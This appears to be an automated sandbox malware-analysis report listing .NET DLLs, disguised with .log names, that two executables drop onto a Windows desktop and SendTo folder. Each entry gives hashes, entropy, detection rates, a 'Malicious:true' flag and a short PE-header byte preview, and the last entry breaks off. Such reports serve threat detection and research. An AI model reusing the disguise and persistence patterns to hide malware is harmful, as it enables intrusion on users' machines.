                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\crpSXvpM.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):126976
                                          Entropy (8bit):6.057993947082715
                                          Encrypted:false
                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                          C:\Users\user\Desktop\cvDcQhTg.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):23552
                                          Entropy (8bit):5.529329139831718
                                          Encrypted:false
                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\dLiSHAoK.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):69632
                                          Entropy (8bit):5.932541123129161
                                          Encrypted:false
                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                          C:\Users\user\Desktop\eqGsIhxV.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33792
                                          Entropy (8bit):5.541771649974822
                                          Encrypted:false
                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\fmuTYeTZ.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):69632
                                          Entropy (8bit):5.932541123129161
                                          Encrypted:false
                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                          C:\Users\user\Desktop\hKwJyjHA.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):33792
                                          Entropy (8bit):5.541771649974822
                                          Encrypted:false
                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\iyARkwDy.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):23552
                                          Entropy (8bit):5.529329139831718
                                          Encrypted:false
                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\jdYrkeMJ.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24576
                                          Entropy (8bit):5.535426842040921
                                          Encrypted:false
                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\kZMRAajN.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):5.645950918301459
                                          Encrypted:false
                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\kvbZFwSt.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):342528
                                          Entropy (8bit):6.170134230759619
                                          Encrypted:false
                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\lWnZWaxI.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34816
                                          Entropy (8bit):5.636032516496583
                                          Encrypted:false
                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                          MD5:996BD447A16F0A20F238A611484AFE86
                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\nuBirctr.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):40448
                                          Entropy (8bit):5.7028690200758465
                                          Encrypted:false
                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\ordqNcIm.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):46592
                                          Entropy (8bit):5.870612048031897
                                          Encrypted:false
                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 5%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\pMdQdXyB.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):36352
                                          Entropy (8bit):5.668291349855899
                                          Encrypted:false
                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\qJFYyXNw.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):342528
                                          Entropy (8bit):6.170134230759619
                                          Encrypted:false
                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\rcIHUqTf.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32768
                                          Entropy (8bit):5.645950918301459
                                          Encrypted:false
                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\tevppZXa.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.660491370279985
                                          Encrypted:false
                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                          MD5:240E98D38E0B679F055470167D247022
                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\wtLyrQzn.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):40448
                                          Entropy (8bit):5.7028690200758465
                                          Encrypted:false
                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 12%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\xlsyLrRW.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):294912
                                          Entropy (8bit):6.010605469502259
                                          Encrypted:false
                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                          C:\Users\user\Desktop\yMEybVxl.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.629584586954759
                                          Encrypted:false
                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                          Malicious:true
                                          Antivirus:
